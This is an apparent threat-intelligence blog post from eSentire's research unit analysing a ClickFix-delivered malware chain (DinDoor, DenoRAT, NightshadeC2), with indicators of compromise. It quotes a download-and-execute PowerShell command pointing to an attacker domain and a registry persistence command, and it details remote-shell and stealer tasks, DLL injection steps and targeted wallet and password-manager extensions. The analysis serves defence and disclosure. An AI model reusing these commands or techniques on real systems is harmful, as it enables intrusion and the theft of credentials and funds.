Threat Response Unit

DinDoor, DenoRAT, and NightshadeC2: Analyzing TAG-150's Evolving Tradecraft

eSentire Threat Response Unit (TRU)

July 15, 2026

17 MINS READ

What did we find?

In June 2026, eSentire's Threat Response Unit (TRU) disrupted a malicious ClickFix-style command in a Finance customer's environment. Further investigation found that the command installs DinDoor, a Deno-based loader, DenoRAT, a Deno-based Remote Access Trojan (RAT), and NightshadeC2, a sophisticated RAT and information stealer associated with TAG-150, a threat group active since March 2025.

Key Takeaways

Initial Access

The ClickFix command used in this attack is shown in the code snippet below. It is responsible for downloading and executing a Microsoft Installer (MSI) file that begins the infection process, ultimately leading to DinDoor, DenoRAT, and NightshadeC2.

powershell.exe -WindowStyle Hidden -Command "iex (wget -UseBasicParsing 'hxxps://cktdpnuwztdn[.]columbnezhjdq[.]com')"

Attack Chain

The attack chain begins with a ClickFix-style social engineering lure that convinces the user to run a command from the Windows Run prompt. This leads to an MSI file being downloaded and executed, which writes and launches Griffin20.ps1. Griffin20.ps1 is an AI-generated PowerShell stage whose role is to ensure the Deno runtime is installed and launch Deno to retrieve and execute the next-stage launcher, DinDoor. DinDoor then leads to a stager, followed by DenoRAT, which ultimately loads NightshadeC2.

Figure 1 - Attack chain diagram, ClickFix -> DinDoor -> DenoRAT -> NightshadeC2
Figure 1 - Attack chain diagram, ClickFix -> DinDoor -> DenoRAT -> NightshadeC2

Griffin20.ps1 Analysis

SHA256: 4ac3e1ecd2c4745f2e846ec7655b92234ee92068bffc7690c3f0184dc25c71da

This stage was likely AI-generated and is written to disk and executed by the MSI file shown in the attack diagram above. Its purpose is to install or locate Deno, then use it to fetch and run the next-stage (DinDoor).

The script first sets PowerShell's execution policy to RemoteSigned and adds the Scoop shims directory, %USERPROFILE%\scoop\shims, to PATH. If winget is missing, it installs Scoop if needed, then uses Scoop to install winget. It then attempts to install Deno with winget.

After installation, the script searches common paths for deno.exe. If Deno is not found, it falls back to installing Deno with Scoop. Once Deno is available, the script runs it with full permissions using deno run -A to fetch and execute the remote launcher:

Figure 2 - Griffin20.ps1 install Deno via Winget or Scoop
Figure 2 - Griffin20.ps1 install Deno via Winget or Scoop

The figure below shows the final section of Griffin20.ps1, where deno.exe is launched from its resolved absolute path. The script also includes likely AI-generated comments that provide insight into how the threat actor's backend generates stages, matching /v02<BUILD_ID>.js.

Figure 3 - Griffin20.ps1 runs command to retrieve DinDoor
Figure 3 - Griffin20.ps1 runs command to retrieve DinDoor

DinDoor Analysis

SHA256: ece42baaca7524460cc5ffc9ae94c2a634a67610decdd2bdc8f134c36fa2dd6c

DinDoor, also known internally as "launcher-1", is a tiny eval-loop that fetches launcher-2, which is responsible for C2 registration, persistence, and loading DenoRAT. It sends an asynchronous request to the C2 server, in this case, webstizkgao[.]com and executes the returned response (DenoRAT stager) via the eval() function.

Figure 4 - DinDoor file contents
Figure 4 - DinDoor file contents

DenoRAT Stager Analysis

SHA256: 7682e9ac86ff47cc198812719ca54e169c3cb21ce584ad2a278a640f4833de46

The DenoRAT stager, also known internally as, "launcher-2" is obfuscated via Obfuscator.io and is responsible for: establishing persistence, registering the infected host with the C2, and fetching/executing DenoRAT.

Persistence is established by fetching DinDoor (launcher-1) from the C2, writing it to disk, and creating a new registry value in the HKCU Run key through the following PowerShell command:

powershell.exe -NoProfile -WindowStyle Hidden -Command "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name '1330705b' -Value 'conhost.exe --headless \"C:\Users\<redacted>\scoop\apps\deno\current\deno.exe\" -A \"C:\Users\<redacted>\AppData\Roaming\1330705b.js\"' -Force"
Figure 5 - Layer-2 stager that establishes persistence and fetches DenoRAT
Figure 5 - Layer-2 stager that establishes persistence and fetches DenoRAT

The figure below illustrates the GET request responsible for retrieving the DinDoor script (the same script covered in the previous section) that is written to disk and persisted with the aforementioned PowerShell command.

Figure 6 - PCAP of network traffic exibited by Layer-2
Figure 6 - PCAP of network traffic exibited by Layer-2

The annotated figure below illustrates communication with the C2, beginning with a GET request to the /user endpoint that includes a hard-coded JSON Web Token (JWT) for authorization purposes, along with the victim's username and hostname. The C2 then responds with an identifier used to retrieve the "main" payload (DenoRAT).

Figure 7 - PCAP of network traffic exhibited by Layer-2 when retrieiving DenoRAT
Figure 7 - PCAP of network traffic exhibited by Layer-2 when retrieiving DenoRAT

During the registration request to the C2, the script sends the following hard-coded JWT. Several fields within the token contain campaign-specific identifiers, likely used by the threat actors for campaign tracking in addition to authorization.

{
  "buildId": "0def066f14754be9",
  "buildNote": "LearnV7msi",
  "buildType": "msi-v2",
  "proxyUrls": [
    "hxxp://webstizkgao[.]com"
  ],
  "userId": "1943c7b8c0a029e2",
  "userNote": "Smokest",
  "accessTokenHash": "2e9812a0dc5998a3f9a59fe64193884a67dadac05171494ffd2b81a711eb1359",
  "iat": 1780457229,
  "exp": 2096033229
}

DenoRAT Analysis

SHA256: 3dffe05d9cc49b2598d743301a8991965056d97bb8d429de461ed66c0dbde28b

DenoRAT, also known as "main" internally, is a sophisticated Remote Access Trojan (RAT) and information stealer comprised of more than 10,000 lines of Deno-JavaScript based code. It is often obfuscated using Obfuscator.io, a free JavaScript obfuscation service commonly abused by threat actors. Its low-level functionality is facilitated by Deno's Foreign Function Interface (FFI), which enables it to call user-mode Windows APIs from DLLs including kernel32.dll, user32.dll, and others.

C2 Communication

DenoRAT supports both WebSocket and HTTP polling for communication with its C2 server. In this instance, DenoRAT uses HTTP, with the supported endpoints listed in the table below. Note, the /user endpoint is used specifically by the layer-2 stager, rather than by DenoRAT itself.

EndpointMethodDescription
/healthGETHealth check with C2
/userPOSTRegister infected device with the C2 using hard-coded JWT
/message-eventGETGet tasks to execute from the C2
/message-eventPOSTData exfil to C2, e.g. victim host information

The figure below shows the C2's response with tasks for DenoRAT after it sends a GET request to the /message-event endpoint. Notably, the ps-exec task contains PowerShell that loads a Python-based shellcode loader that ultimately executes NightshadeC2. This script is covered in detail in the Loader section later in this blog.

Figure 8 - Task JSON returned by the C2
Figure 8 - Task JSON returned by the C2

To provide additional network-level context, the figure below shows the full PCAP view of the GET request and corresponding C2 response, including the tasks returned for processing.

Figure 9 - PCAP traffic of DenoRAT getting tasks from C2
Figure 9 - PCAP traffic of DenoRAT getting tasks from C2

In the next figure, the request/response is shown in DenoRAT's handling of the sysinfo task, where a comprehensive list of the victim's host information is transmitted to the C2 via POST request to the /message-event endpoint.

Figure 10 - PCAP traffic to the C2 containing victim host information
Figure 10 - PCAP traffic to the C2 containing victim host information

Task types handled by DenoRAT are described in the table below.

Task TypeDescription
execRemote shell, execute commands via cmd.exe /c <command>
exec-psRemote shell, execute commands via powershell.exe -NoProfile -NonInteractive -Command <command>
sysinfoSystem information collection and exfiltration to C2, including: username, hostname, domain, os name, os version, os build, installed anti-virus, cpu count, gpu count, installed RAM (MB), running as admin, has admin rights
stealerSystem information collection, chromium (support for App Bound Encryption) + gecko-based browser credit card, cookie, and credential theft, cryptocurrency wallets (extension and desktop based), password manager extensions, Telegram data and Discord token theft
screenshotUses user32/gdi32 to capture a screenshot of the victim's desktop, sent to the C2 as a base64 encoded JPEG file
exec-scWrites a temporary file with the extension ".mjs" containing C2-supplied Deno-JavaScript code to execute (executed via import statement)
pty-startStart a PTY session through cmd, deno (repl), or powershell
pty-inputWrite input to the PTY session
pty-resizeResize the PTY session
pty-closeClose the PTY session
vnc-startStream the victim's desktop and accept remote mouse, keyboard, and clipboard events.
vnc-stopStop/clean up VNC session associated with specified session ID
fs-list-drivesEnumerate drives (and network mapped drives) and return a list of each drive's letter, label, type, total size, and free size.
fs-list-dirEnumerate a C2-specified directory and return a list of files/directories within it.
fs-downloadExfiltrate C2-specified file from victim host
fs-uploadDownload C2-specified file to victim host
fs-deleteDelete C2-specified file from victim host

Similarly to the prior stage (launcher-2), a hard-coded JWT is transmitted in requests to the C2 for communication authorization purposes. It is almost identical to the token used in the previous stage, except the userNote field is absent and the iat / exp fields differ.

{
  "buildId": "0def066f14754be9",
  "buildNote": "LearnV7msi",
  "buildType": "msi-v2",
  "proxyUrls": [
    "hxxp://webstizkgao[.]com"
  ],
  "userId": "1943c7b8c0a029e2",
  "accessTokenHash": "2e9812a0dc5998a3f9a59fe64193884a67dadac05171494ffd2b81a711eb1359",
  "iat": 1783445253,
  "exp": 2099021253
}

Chromium ABE Bypass via DLL Injection

Although TRU did not observe this behavior, DenoRAT contains functionality to inject a C2-supplied DLL into Chromium-based browser processes to support App-Bound Encryption (ABE) bypass. Notably, the final payload in this attack was intended to deliver NightshadeC2, a fully featured stealer that handles ABE decryption itself, making this DenoRAT feature unnecessary in this instance.

To prepare for injection, it enumerates running processes matching the browser list below using the Windows APIs CreateToolhelp32Snapshot, Process32First, and Process32Next. Matching processes are then opened and terminated using OpenProcess and TerminateProcess.

After terminating browser processes, DenoRAT checks whether ESET is present on the host. If ESET is detected, the malware skips DLL injection entirely. This suggests the threat actors may have tested against AV/EDR products and found that ESET detects the process injection technique and/or the ABE bypass method.

Figure 11 - Kill browsers and check before DLL injection if ESET is present
Figure 11 - Kill browsers and check before DLL injection if ESET is present

Before injection, the malware creates a named pipe with CreateNamedPipeW to support inter-process communication with the injected DLL and starts the Chromium-based browser process in a suspended state via CreateProcessW with CREATE_SUSPENDED flag for the dwCreationFlags parameter.

Figure 12 - Create target browser process suspended
Figure 12 - Create target browser process suspended

DenoRAT creates named pipes that resemble legitimate Chrome or Edge named pipes, selecting the format based on the targeted browser process.

Figure 13 - Named pipes mimic legitimate Chromium-based browser pipes
Figure 13 - Named pipes mimic legitimate Chromium-based browser pipes

It then performs DLL injection [T1055.001] by allocating memory in the target browser process with VirtualAllocEx, writing the DLL with WriteProcessMemory, changing protections to PAGE_EXECUTE_READ via VirtualProtectEx, and starting execution via CreateRemoteThread.

Figure 14 - Initialize FFI, create named pipe, inject DLL
Figure 14 - Initialize FFI, create named pipe, inject DLL

The figure below displays the core injection routine. It begins by finding the offset to the C2-supplied DLL payload's Bootstrap export, likely indicating threat actors use the payload available in the open-source GitHub repository ChromElevator. The code uses VirtualAllocEx to allocate memory in the target process, WriteProcessMemory to copy the ChromElevator payload DLL and pipe name into the target process, VirtualProtectEx to change page permissions to executable, and CreateRemoteThread to execute the ChromElevator DLL.

Figure 15 - Inject DLL and write named pipe to process's memory
Figure 15 - Inject DLL and write named pipe to process's memory

Anti-Virus Enumeration

In the fingerprinting process (sysinfo task), DenoRAT enumerates over a specific list of directories to identify installed Anti-Virus software.

Figure 16 - Anti-Virus identification routine
Figure 16 - Anti-Virus identification routine

The full list is shown in the table below.

Directory NameInternal Identifier
C:\Program Files\Windows DefenderMicrosoft Defender Antivirus
C:\Program Files\Windows Defender Advanced Threat ProtectionMicrosoft Defender for Endpoint
C:\Program Files\Microsoft Defender ATPMicrosoft Defender for Endpoint
C:\ProgramData\Microsoft\Windows DefenderMicrosoft Defender Antivirus
C:\Program Files\Kaspersky LabKaspersky
C:\Program Files\KasperskyKaspersky
C:\Program Files\ESETESET
C:\Program Files (x86)\ESETESET
C:\Program Files\NortonNorton
C:\Program Files\SymantecSymantec (Broadcom)
C:\Program Files\McAfeeMcAfee
C:\Program Files\Trend MicroTrend Micro
C:\Program Files\BitdefenderBitdefender
C:\Program Files\Avast SoftwareAvast
C:\Program Files\AVGAVG
C:\ProgramData\AvastAvast
C:\Program Files\SophosSophos
C:\ProgramData\SophosSophos
C:\Program Files\CrowdStrikeCrowdStrike Falcon
C:\ProgramData\CrowdStrikeCrowdStrike Falcon
C:\Program Files\SentinelOneSentinelOne
C:\ProgramData\SentinelOneSentinelOne
C:\Program Files\VMware\Carbon BlackVMware Carbon Black
C:\Program Files\Carbon BlackCarbon Black
C:\ProgramData\Carbon BlackCarbon Black
C:\Program Files\CylanceCylance
C:\Program Files\CylanceProtectCylance Protect
C:\Program Files\Cisco\AMPCisco AMP for Endpoints
C:\Program Files\Cisco\AMP for EndpointsCisco AMP
C:\Program Files\MalwarebytesMalwarebytes
C:\Program Files\Panda SecurityPanda Security
C:\Program Files\F-SecureF-Secure
C:\Program Files\ComodoComodo

Targeted Browser Extensions: Crypto-Wallets, Password Managers, and Authenticators

The following table lists the browser extensions and corresponding extension IDs targeted by DenoRAT for exfiltration, including MFA authenticators, password managers, and cryptocurrency wallets.

Targeted Browser ExtensionBrowser Extension ID
Authenticatorbhghoamapcdpbohphigoooaddinpkbai
EOSAuthenticatoroeljdldpnmdbchonielidgobddffflal
Bitwardennngceckbapebfimnlniiiahkandclblb
KeePassXCoboonakemofpalcgghocfoadofidjkkk
Dashlanefdjamakpfbbddfjaooikfcpapjohcfmg
1Passwordaeblfdkhhhdcdjpifhhbdiojplfjncoa
NordPassfooolghllnmhmmndgjiamiiodkpenpbb
Keeperbfogiafebfohielmmehodmfbbebbbpei
RoboFormpnlccmojcmeohlpggmfnbbiapkmbliob
LastPasshdokiejnpimakedhajhdlcegeplioahd
BrowserPassnaepdomgkenhinolocfifgehidddafch
MYKIbmikpgodpkclnkgmnpphehdgcimmided
Splikityjhfjfclepacoldmjmkmdlmganfaalklb
CommonKeychgfefjpcobfbnpmiokfjjaglahmnded
ZohoVaultigkpcodhieompeloncfnbekccinhapdb
NortonPasswordManageradmmjipmmciaobhojoghlmleefbicajg
AviraPasswordManagercaljgklbbfbcjjanaijlacgncafpegll
TrezorPasswordManagerimloifkgjagghnncjkhggdhalmcnfklk
MetaMasknkbihfbeogaeaoehlefnkodbefgpgknn
MetaMask_edgeejbalbakoplchlghecdalmeeeajnimhm
TronLinkibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChainfhbohimaelbohpjbbldcngcnapndodjp
Coin98aeachknmefphepccionboohckonoeemg
iWalletkncchdigobghenbbaddojjnnaogfppfj
Wombatamkmjjmmflddogmhpjloimipbofnfjih
MEWCXnlbmnnijcnlegkjjpcfjclmcfggfefdm
NeoLinecphhlgmgameodnhkjdmkpanlelnlohao
TerraStationaiifbnbfobpmeekipheeijimdpnlpgpp
Keplrdmkamcknogkgcdfhhbddcghachkejeap
Solletfhmfendgdocmcbmfikdcogofphimnkno
ICONexflpiciilemghbmfalicajoolhkkenfel
KHChcflpincpppdclinealmandijcmnkbgn
TezBoxmnfifefkajgofkcjkemidiaecocnkjeh
Byonenlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKeyinfeboajgfhgbjpjbeppbkgnabfdkdaf
DAppPlaylodccjjbdhfakaekdiahmedfbieldgik
BitClipijmpgkjfkbfhoebgogflfebnmejmfbml
SteemKeychainlkcjlnjfpbikmcmbachjpdbijejflpcm
NashExtensiononofpnbbkehpmmoabgpcpmigafmmnjhl
HyconLiteClientbcopgchhojmggmffilplmbdicgaihlkp
ZilPayklnaejjgbibmhlephnhpmaofohgkpgkd
LeafWalletcihmoadaighcejopammfbmddcmdekcje
CyanoWalletdkdedlpgdmmkkfjabffeganieamfklkm
CyanoWalletProicmkfkmjoklfhlfdkkkgpnpldkgdmhoe
NaboxWalletnknhiehlklippafakaeklbeglecifhad
PolymeshWalletjojhfeoedkpkglbfimdfabpdfjaoolaf
NiftyWalletjbdaocneiiinmjbjlgalhcelgbejmnid
LiqualityWalletkpfopkelmapcoipemfendmdcghnegimn
MathWalletafbcbjpbpfadlkmhmclhkeeodmamcflc
CoinbaseWallethnfanknocfeofbddgcijnmhnfnkdnaad
CloverWalletnhnkbkgjikgcigadomkphalanndcapjk
Yoroiffnbelfdoeiohenkjibnmadjiehjhajb
Guardahpglfhgfnhbgpjdenjgmdgoeiappafln
EQUALWalletblnieiiffboillknjnepogjhkgnoapac
BitAppWalletfihkakfobkmkjojpchpfgcmhfjnmnfpi
AuroWalletcnmamaachppnkjgnildpdmkaakejnhae
SaturnWalletnkddgncdjgjfcddamfgcmfnlhccnimig
RoninWalletfnjhmkhhmkbjkkabndcnnogagogbneec
Exodusaholpfdialjgjfhomihkjbmgjidlcdno
MaiarDeFiWalletdngmlblcodfobpdpecaadgfbcggfjfnm
Namilpfcbjknijpeeillifnkikgncikgfhdo
Eternlkmhcihpebfmpgmihbkipmjlmmioameka
PhantomWalletbfnaelmomeimhlpmgjnjophhpkkoljpa
TrustWalletegjidjbpglichdcondbcbdnbeeppgdph

Loader

DenoRAT includes a broad set of tasks that make up its loader functionality. TRU observed the malware's C2 return an exec-ps task after the victim registration request. This task contained PowerShell code that ultimately executes the NightshadeC2 RAT/infostealer in memory via a Python-based shellcode loader.

The beautified PowerShell is shown in the figure below, which is responsible for downloading a self-contained Python archive and reflective PE loader named install.pyc (pre-compiled via python 3.13.0, SHA256: e0dd60bb3a409029988db6a10cb1e36586c2636da9eff3a3587bc38473fde54b).

Figure 17 - PowerShell loader that drops python and encrypted NightshadeC2 container file
Figure 17 - PowerShell loader that drops python and encrypted NightshadeC2 container file

The contents of the decompiled "install.pyc" (SHA256: c2cdf1ecd6684bbcef0405444a570a76e9589bbd563476b08788bde34d83b511) are shown in the next figure. This script is simply a stager that decrypts and executes the next stage.

Figure 18 - First stage of Python-based shellcode loader
Figure 18 - First stage of Python-based shellcode loader

The figure below displays the Input/Output result in CyberChef after decrypting the prior stage's tomemexec bytes from RC4, yielding the core python script (SHA256: a06d514a34d2ab08c3a13a58056827c50ba9bf01b68ca4b2cecb4e1462af53fa) responsible for decrypting and executing NightshadeC2 in memory.

Figure 19 - Decryption of the Python-based shellcode loader via CyberChef
Figure 19 - Decryption of the Python-based shellcode loader via CyberChef

The next figure shows the beginning of the Python-based loader, annotated to highlight the shellcode entrypoint offset, the container file downloaded by the previously shown PowerShell stage containing the encrypted NightshadeC2 payload, the AES-256 key used to decrypt the container file, and the raw shellcode bytes.

Figure 20 - Beginning contents of the python-based shellcode loader
Figure 20 - Beginning contents of the python-based shellcode loader

The remainer of the loader performs the following functions:

  1. Allocates a RW page via VirtualAlloc and memcpys a x64 reflective PE loader into it (SHA256: fa0d1adb545881a2d8a508191961a9fd39485c4ac2a0f20ad8e2f931dc45c9ef).
  2. Reads the encrypted container file "7sjVtn0zPVjMZzkxZ.MOa" - dropped by the initial PowerShell stage - into memory and slices starting at offset 0x5407D0 (the preceeding bytes are decoy padding).
  3. Decrypts the PE via Microsoft Crypto APIs: AES-256-CBC where the key = SHA-256("MoscauHighSmoke").
  4. Calls VirtualProtect to change the shellcode page protection from RW to PAGE_EXECUTE_READ.
  5. Casts shellcode_base + 0x5B8 to a function pointer and invokes it with the address of the decrypted PE (skipping decoy bytes) as its argument, effectively transferring control to the reflective loader within the Python process. The loader maps the PE: VirtualAlloc + section copy, IAT fix-ups by DJB2 API-hash resolution, patches the current process's first PEB LDR entry and PEB image base as an evasion technique in an attempt to deceive security products, and jumps to the PE's AddressOfEntryPoint, effectively transferring control to the NightshadeC2 payload (SHA256: c1e0a0543b12c64726f8bb36389010d7f35e57993a22ce5b73c56b9cc2a87a00).
Figure 21 - Code in the python-based shellcode loader that handles decryption of the container and entry into shellcode
Figure 21 - Code in the python-based shellcode loader that handles decryption of the container and entry into shellcode

The next figure shows the shellcode entrypoint, which accepts a single parameter from the Python loader containing the raw payload's base address. Notably, after reflective injection, the shellcode updates the current Python process's PEB.ImageBaseAddress field and the first loader data table entry to point to the payload's base address. It then resolves the payload's entrypoint and calls it, effectively transfering control to the mapped payload (NightshadeC2).

Figure 22 - Decompiler view of the reflective PE injection shellcode
Figure 22 - Decompiler view of the reflective PE injection shellcode

The shellcode loader uses the DJB2 hashing algorithm to resolve exports required for PE mapping, including VirtualAlloc, LoadLibrary, and VirtualProtect. It also uses DJB2 hashing to resolve imports during Import Address Table (IAT) fix-ups and to identify module base addresses.

Figure 23 - Decompiler view of the DJB2 hashing routine
Figure 23 - Decompiler view of the DJB2 hashing routine

What did we do?

What can you learn from this TRU Positive?

Recommendations from the Threat Response Unit (TRU)

Indicators of Compromise

The table below lists Indicators of Compromise for the full attack chain.

TypeValueDescription
Domain-Namecolumbnezhjdq[.]comClickFix domain
Domain-Namewebstizkgao[.]comC2 server for DinDoor + DenoRAT stager + DenoRAT
URLhttp://webstizkgao[.]com/message-eventDenoRAT C2 endpoint for receiving tasks/exfiltrating stolen information
URLhttp://webstizkgao[.]com/healthHealth check URL
URLhttp://webstizkgao[.]com/userInfected device registration URL
Domain-Namesmallsmokik[.]comNightshadeC2 C2 server (dead-drop)
File6103228087aaee53f37db88ab7aa1e7e5dd8c27a395bef7e3af985774a888c94exec-ps task contents containing PowerShell used to decrypt/execute NightshadeC2
File1f233db3e59051811e16c65e32121f69dd80e91567002978e47a613a5a4903b0exec-ps task PowerShell code that downloads/executes python-based loader "install.pyc"
Filee0dd60bb3a409029988db6a10cb1e36586c2636da9eff3a3587bc38473fde54bNightshadeC2 stager "install.pyc" (retrieved from DenoRAT C2 via exec-ps task)
Fileb4fd836b82f2d8daf8b90a95046987e993e5687707fc57b527a8145d865e3fdcEncrypted NightshadeC2 payload (decrypted/executed by install.pyc)
Filec1e0a0543b12c64726f8bb36389010d7f35e57993a22ce5b73c56b9cc2a87a00NightshadeC2 payload
Filee0dd60bb3a409029988db6a10cb1e36586c2636da9eff3a3587bc38473fde54bDenoRAT install.pyc
Filec2cdf1ecd6684bbcef0405444a570a76e9589bbd563476b08788bde34d83b511DenoRAT install.py
Filea06d514a34d2ab08c3a13a58056827c50ba9bf01b68ca4b2cecb4e1462af53faDenoRAT install.py stage 2 python
Filefa0d1adb545881a2d8a508191961a9fd39485c4ac2a0f20ad8e2f931dc45c9efDenoRAT install.py reflective PE loader shellcode

References

To learn how eSentire can help you find exposures and defend your organization, connect with an eSentire Security Specialist now.

GET STARTED

ABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Back to blog

Take Your Cybersecurity Program to the Next Level with eSentire MDR.

BUILD A QUOTE

Read Similar Blogs

EXPLORE MORE BLOGS